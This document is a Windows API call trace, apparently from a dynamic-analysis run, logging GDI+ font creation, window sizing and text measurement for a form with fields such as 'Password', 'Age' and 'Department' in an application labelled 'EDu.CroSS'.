[0126.957] GetLastError () returned 0x0
[0126.957] GdipDeleteGraphics (graphics=0x657f9c8) returned 0x0
[0126.957] GetLastError () returned 0x0
[0126.957] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.957] GetLastError () returned 0x0
[0126.957] GetSystemMetrics (nIndex=5) returned 1
[0126.957] GetSystemMetrics (nIndex=6) returned 1
[0126.957] GetSystemMetrics (nIndex=5) returned 1
[0126.957] GetSystemMetrics (nIndex=6) returned 1
[0126.957] AdjustWindowRectEx (in: lpRect=0x19dc84, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc84) returned 1
[0126.957] GetSystemMetrics (nIndex=5) returned 1
[0126.957] GetSystemMetrics (nIndex=6) returned 1
[0126.957] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.957] GetSystemMetrics (nIndex=5) returned 1
[0126.957] GetSystemMetrics (nIndex=6) returned 1
[0126.958] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.958] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.958] GetLastError () returned 0x0
[0126.958] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x27851e4) returned 0x0
[0126.958] GetLastError () returned 0x0
[0126.958] GdipGetFontSize (font=0x657f8b8, size=0x27851e8) returned 0x0
[0126.958] GetLastError () returned 0x0
[0126.959] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.959] GetLastError () returned 0x0
[0126.959] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dd38) returned 0x0
[0126.959] GetLastError () returned 0x0
[0126.959] GdipGetFontHeight (font=0x657f8b8, graphics=0x657f9c8, height=0x19dd30) returned 0x0
[0126.959] GetLastError () returned 0x0
[0126.959] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.959] GetLastError () returned 0x0
[0126.959] GdipDeleteGraphics (graphics=0x657f9c8) returned 0x0
[0126.959] GetLastError () returned 0x0
[0126.959] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.959] GetLastError () returned 0x0
[0126.959] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.959] GetLastError () returned 0x0
[0126.959] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dccc) returned 0x0
[0126.960] GetLastError () returned 0x0
[0126.960] GdipGetFontHeight (font=0x657f8b8, graphics=0x657f9c8, height=0x19dcc4) returned 0x0
[0126.960] GetLastError () returned 0x0
[0126.960] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.960] GetLastError () returned 0x0
[0126.960] GdipDeleteGraphics (graphics=0x657f9c8) returned 0x0
[0126.960] GetLastError () returned 0x0
[0126.960] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.960] GetLastError () returned 0x0
[0126.960] GetSystemMetrics (nIndex=5) returned 1
[0126.960] GetSystemMetrics (nIndex=6) returned 1
[0126.960] GetSystemMetrics (nIndex=5) returned 1
[0126.960] GetSystemMetrics (nIndex=6) returned 1
[0126.960] AdjustWindowRectEx (in: lpRect=0x19dc84, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc84) returned 1
[0126.960] GetSystemMetrics (nIndex=5) returned 1
[0126.960] GetSystemMetrics (nIndex=6) returned 1
[0126.960] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.960] GetSystemMetrics (nIndex=5) returned 1
[0126.960] GetSystemMetrics (nIndex=6) returned 1
[0126.960] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.974] GdipCreateFontFamilyFromName (name="Postinkantaja Job", fontCollection=0x0, fontFamily=0x19dd5c) returned 0xe
[0126.974] GetLastError () returned 0x0
[0126.974] GdipGetGenericFontFamilySansSerif (nativeFamily=0x19dd4c) returned 0x0
[0126.974] GetLastError () returned 0x0
[0126.974] GdipCreateFont (fontFamily=0x11111111, emSize=0x42100000, style=0, unit=0x3, font=0x278547c) returned 0x0
[0126.974] GetLastError () returned 0x0
[0126.974] GdipGetFontSize (font=0x657f728, size=0x2785480) returned 0x0
[0126.974] GetLastError () returned 0x0
[0126.974] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.974] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.976] GdipCreateFontFamilyFromName (name="Postinkantaja Job", fontCollection=0x0, fontFamily=0x19dd5c) returned 0xe
[0126.976] GetLastError () returned 0x0
[0126.976] GdipGetGenericFontFamilySansSerif (nativeFamily=0x19dd4c) returned 0x0
[0126.976] GetLastError () returned 0x0
[0126.976] GdipCreateFont (fontFamily=0x11111111, emSize=0x42900000, style=0, unit=0x3, font=0x27856cc) returned 0x0
[0126.976] GetLastError () returned 0x0
[0126.976] GdipGetFontSize (font=0x657f908, size=0x27856d0) returned 0x0
[0126.976] GetLastError () returned 0x0
[0126.976] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.976] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.978] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.978] GetLastError () returned 0x0
[0126.978] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x27859c4) returned 0x0
[0126.978] GetLastError () returned 0x0
[0126.978] GdipGetFontSize (font=0x657f778, size=0x27859c8) returned 0x0
[0126.978] GetLastError () returned 0x0
[0126.978] AdjustWindowRectEx (in: lpRect=0x19dd14, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd14) returned 1
[0126.978] AdjustWindowRectEx (in: lpRect=0x19dd14, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd14) returned 1
[0126.980] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.980] GetLastError () returned 0x0
[0126.980] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x2785c84) returned 0x0
[0126.980] GetLastError () returned 0x0
[0126.980] GdipGetFontSize (font=0x657f7a0, size=0x2785c88) returned 0x0
[0126.980] GetLastError () returned 0x0
[0126.980] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.980] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.982] GdipCreateFontFamilyFromName (name="Segoe UI Semibold", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.982] GetLastError () returned 0x0
[0126.982] GdipCreateFont (fontFamily=0x6576ca0, emSize=0x41640000, style=1, unit=0x3, font=0x2785ed4) returned 0x0
[0127.102] GetLastError () returned 0x0
[0127.102] GdipGetFontSize (font=0x657f610, size=0x2785ed8) returned 0x0
[0127.102] GetLastError () returned 0x0
[0127.102] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0127.102] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0127.246] AdjustWindowRectEx (in: lpRect=0x19dd2c, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x19dd2c) returned 1
[0127.254] GetSystemMetrics (nIndex=59) returned 1456
[0127.254] GetSystemMetrics (nIndex=60) returned 916
[0127.255] GetSystemMetrics (nIndex=34) returned 136
[0127.255] GetSystemMetrics (nIndex=35) returned 39
[0127.258] GetSystemMetrics (nIndex=80) returned 1
[0127.260] AdjustWindowRectEx (in: lpRect=0x19dc4c, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x19dc4c) returned 1
[0127.267] GetCurrentThreadId () returned 0x600
[0127.267] GetCurrentThreadId () returned 0x600
[0127.369] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.370] GetLastError () returned 0x0
[0127.413] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2786234) returned 0x0
[0127.413] GetLastError () returned 0x0
[0127.421] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.423] GetLastError () returned 0x0
[0127.426] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.426] GetLastError () returned 0x0
[0127.427] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.427] GetLastError () returned 0x0
[0127.428] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.428] GetLastError () returned 0x0
[0127.430] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.430] GetLastError () returned 0x0
[0127.458] GdipMeasureString (graphics=0x657fb88, string="All fields are mandatory", length=24, font=0x657f610, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.488] GetLastError () returned 0x0
[0127.489] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.490] GetLastError () returned 0x0
[0127.491] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.491] GetLastError () returned 0x0
[0127.491] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.491] GetLastError () returned 0x0
[0127.491] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.491] GetLastError () returned 0x0
[0127.496] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.565] GetCurrentThreadId () returned 0x600
[0127.566] GetCurrentThreadId () returned 0x600
[0127.566] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.566] GetLastError () returned 0x0
[0127.566] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2786390) returned 0x0
[0127.566] GetLastError () returned 0x0
[0127.566] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.566] GetLastError () returned 0x0
[0127.566] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.567] GetLastError () returned 0x0
[0127.567] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.567] GetLastError () returned 0x0
[0127.567] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.567] GetLastError () returned 0x0
[0127.567] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.567] GetLastError () returned 0x0
[0127.567] GdipMeasureString (graphics=0x657fb88, string="user", length=4, font=0x657f7a0, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.567] GetLastError () returned 0x0
[0127.567] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.567] GetLastError () returned 0x0
[0127.567] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.567] GetLastError () returned 0x0
[0127.567] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.568] GetLastError () returned 0x0
[0127.568] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.568] GetLastError () returned 0x0
[0127.568] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.568] GetCurrentThreadId () returned 0x600
[0127.568] GetCurrentThreadId () returned 0x600
[0127.568] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.568] GetLastError () returned 0x0
[0127.568] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x27864ec) returned 0x0
[0127.568] GetLastError () returned 0x0
[0127.568] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.568] GetLastError () returned 0x0
[0127.568] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.568] GetLastError () returned 0x0
[0127.568] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.568] GetLastError () returned 0x0
[0127.568] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.569] GetLastError () returned 0x0
[0127.569] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.569] GetLastError () returned 0x0
[0127.569] GdipMeasureString (graphics=0x657fb88, string="Test your knowledge", length=19, font=0x657f728, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.569] GetLastError () returned 0x0
[0127.569] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.569] GetLastError () returned 0x0
[0127.569] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.569] GetLastError () returned 0x0
[0127.569] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.569] GetLastError () returned 0x0
[0127.569] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.569] GetLastError () returned 0x0
[0127.569] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.569] GetCurrentThreadId () returned 0x600
[0127.569] GetCurrentThreadId () returned 0x600
[0127.569] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.570] GetLastError () returned 0x0
[0127.570] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2786648) returned 0x0
[0127.570] GetLastError () returned 0x0
[0127.570] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.570] GetLastError () returned 0x0
[0127.570] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.570] GetLastError () returned 0x0
[0127.570] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.570] GetLastError () returned 0x0
[0127.570] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.570] GetLastError () returned 0x0
[0127.570] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.570] GetLastError () returned 0x0
[0127.570] GdipMeasureString (graphics=0x657fb88, string="EDu.CroSS", length=9, font=0x657f908, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.570] GetLastError () returned 0x0
[0127.570] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.570] GetLastError () returned 0x0
[0127.570] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.570] GetLastError () returned 0x0
[0127.570] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.570] GetLastError () returned 0x0
[0127.570] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.570] GetLastError () returned 0x0
[0127.570] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.570] GetCurrentThreadId () returned 0x600
[0127.570] GetCurrentThreadId () returned 0x600
[0127.584] GetCurrentThreadId () returned 0x600
[0127.584] GetCurrentThreadId () returned 0x600
[0127.593] GetCurrentThreadId () returned 0x600
[0127.593] GetCurrentThreadId () returned 0x600
[0127.594] GetCurrentThreadId () returned 0x600
[0127.594] GetCurrentThreadId () returned 0x600
[0127.594] GetCurrentThreadId () returned 0x600
[0127.594] GetCurrentThreadId () returned 0x600
[0127.594] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.594] GetLastError () returned 0x0
[0127.594] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2786a3c) returned 0x0
[0127.594] GetLastError () returned 0x0
[0127.595] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.595] GetLastError () returned 0x0
[0127.595] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.595] GetLastError () returned 0x0
[0127.595] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.595] GetLastError () returned 0x0
[0127.595] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.595] GetLastError () returned 0x0
[0127.595] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.595] GetLastError () returned 0x0
[0127.595] GdipMeasureString (graphics=0x657fb88, string="Gender:-", length=8, font=0x657f890, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.595] GetLastError () returned 0x0
[0127.595] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.595] GetLastError () returned 0x0
[0127.595] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.595] GetLastError () returned 0x0
[0127.595] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.595] GetLastError () returned 0x0
[0127.595] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.595] GetLastError () returned 0x0
[0127.595] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.596] GetCurrentThreadId () returned 0x600
[0127.596] GetCurrentThreadId () returned 0x600
[0127.596] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.596] GetLastError () returned 0x0
[0127.596] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2786b98) returned 0x0
[0127.596] GetLastError () returned 0x0
[0127.596] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.596] GetLastError () returned 0x0
[0127.596] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.596] GetLastError () returned 0x0
[0127.596] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.596] GetLastError () returned 0x0
[0127.596] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.596] GetLastError () returned 0x0
[0127.596] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.596] GetLastError () returned 0x0
[0127.596] GdipMeasureString (graphics=0x657fb88, string="Age:-", length=5, font=0x657f7f0, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.596] GetLastError () returned 0x0
[0127.596] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.596] GetLastError () returned 0x0
[0127.596] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.596] GetLastError () returned 0x0
[0127.596] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.596] GetLastError () returned 0x0
[0127.597] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.597] GetLastError () returned 0x0
[0127.597] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.597] GetCurrentThreadId () returned 0x600
[0127.597] GetCurrentThreadId () returned 0x600
[0127.597] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.604] GetLastError () returned 0x0
[0127.604] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2786cf4) returned 0x0
[0127.604] GetLastError () returned 0x0
[0127.604] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.604] GetLastError () returned 0x0
[0127.604] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.604] GetLastError () returned 0x0
[0127.604] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.604] GetLastError () returned 0x0
[0127.605] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.605] GetLastError () returned 0x0
[0127.605] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.605] GetLastError () returned 0x0
[0127.605] GdipMeasureString (graphics=0x657fb88, string="Confirm Password:-", length=18, font=0x657f868, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.605] GetLastError () returned 0x0
[0127.605] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.605] GetLastError () returned 0x0
[0127.605] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.605] GetLastError () returned 0x0
[0127.605] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.605] GetLastError () returned 0x0
[0127.605] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.605] GetLastError () returned 0x0
[0127.605] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.605] GetCurrentThreadId () returned 0x600
[0127.605] GetCurrentThreadId () returned 0x600
[0127.610] GetCurrentThreadId () returned 0x600
[0127.610] GetCurrentThreadId () returned 0x600
[0127.610] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.610] GetLastError () returned 0x0
[0127.610] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2786e9c) returned 0x0
[0127.610] GetLastError () returned 0x0
[0127.610] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.610] GetLastError () returned 0x0
[0127.610] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.610] GetLastError () returned 0x0
[0127.610] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.610] GetLastError () returned 0x0
[0127.610] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.610] GetLastError () returned 0x0
[0127.610] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.610] GetLastError () returned 0x0
[0127.610] GdipMeasureString (graphics=0x657fb88, string="Password:-", length=10, font=0x657f8e0, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.610] GetLastError () returned 0x0
[0127.611] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.611] GetLastError () returned 0x0
[0127.611] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.611] GetLastError () returned 0x0
[0127.611] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.611] GetLastError () returned 0x0
[0127.611] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.611] GetLastError () returned 0x0
[0127.611] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.611] GetCurrentThreadId () returned 0x600
[0127.611] GetCurrentThreadId () returned 0x600
[0127.611] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.611] GetLastError () returned 0x0
[0127.611] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2786ff8) returned 0x0
[0127.611] GetLastError () returned 0x0
[0127.611] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.612] GetLastError () returned 0x0
[0127.612] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.612] GetLastError () returned 0x0
[0127.612] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.612] GetLastError () returned 0x0
[0127.612] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.612] GetLastError () returned 0x0
[0127.612] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.612] GetLastError () returned 0x0
[0127.612] GdipMeasureString (graphics=0x657fb88, string="Department:-", length=12, font=0x657f598, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.612] GetLastError () returned 0x0
[0127.612] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.612] GetLastError () returned 0x0
[0127.612] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.612] GetLastError () returned 0x0
[0127.612] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.612] GetLastError () returned 0x0
[0127.612] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.612] GetLastError () returned 0x0
[0127.612] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.612] GetCurrentThreadId () returned 0x600
[0127.612] GetCurrentThreadId () returned 0x600
[0127.612] GetCurrentThreadId () returned 0x600
[0127.612] GetCurrentThreadId () returned 0x600
[0127.612] GetCurrentThreadId () returned 0x600
[0127.612] GetCurrentThreadId () returned 0x600
[0127.613] GetCurrentThreadId () returned 0x600
[0127.613] GetCurrentThreadId () returned 0x600
[0127.613] GetCurrentThreadId () returned 0x600
[0127.613] GetCurrentThreadId () returned 0x600
[0127.613] GetCurrentThreadId () returned 0x600
[0127.613] GetCurrentThreadId () returned 0x600
[0127.613] GetCurrentThreadId () returned 0x600
[0127.613] GetCurrentThreadId () returned 0x600
[0127.614] GetCurrentThreadId () returned 0x600
[0127.614] GetCurrentThreadId () returned 0x600
[0127.614] GetCurrentThreadId () returned 0x600
[0127.614] GetCurrentThreadId () returned 0x600
[0127.614] GetCurrentThreadId () returned 0x600
[0127.614] GetCurrentThreadId () returned 0x600
[0127.614] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.614] GetLastError () returned 0x0
[0127.614] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x2787490) returned 0x0
[0127.614] GetLastError () returned 0x0
[0127.614] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.614] GetLastError () returned 0x0
[0127.614] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.614] GetLastError () returned 0x0
[0127.614] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0127.615] GetLastError () returned 0x0
[0127.615] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19dbe8) returned 0x0
[0127.615] GetLastError () returned 0x0
[0127.615] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0127.615] GetLastError () returned 0x0
[0127.615] GdipMeasureString (graphics=0x657fb88, string="Last Name", length=9, font=0x657f458, layoutRect=0x19dbe4, stringFormat=0x657fe68, boundingBox=0x19dbd4, codepointsFitted=0x19dbd0, linesFilled=0x19dbcc) returned 0x0
[0127.615] GetLastError () returned 0x0
[0127.615] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.615] GetLastError () returned 0x0
[0127.615] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0127.615] GetLastError () returned 0x0
[0127.615] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0127.615] GetLastError () returned 0x0
[0127.615] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0127.615] GetLastError () returned 0x0
[0127.615] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0127.615] GetCurrentThreadId () returned 0x600
[0127.615] GetCurrentThreadId () returned 0x600
[0127.615] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19dc04) returned 0x0
[0127.616] GetLastError () returned 0x0
[0127.616] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x27875ec) returned 0x0
[0127.616] GetLastError () returned 0x0
[0127.616] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.616] GetLastError () returned 0x0
[0127.616] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0127.616] GetLastError () returned 0x0
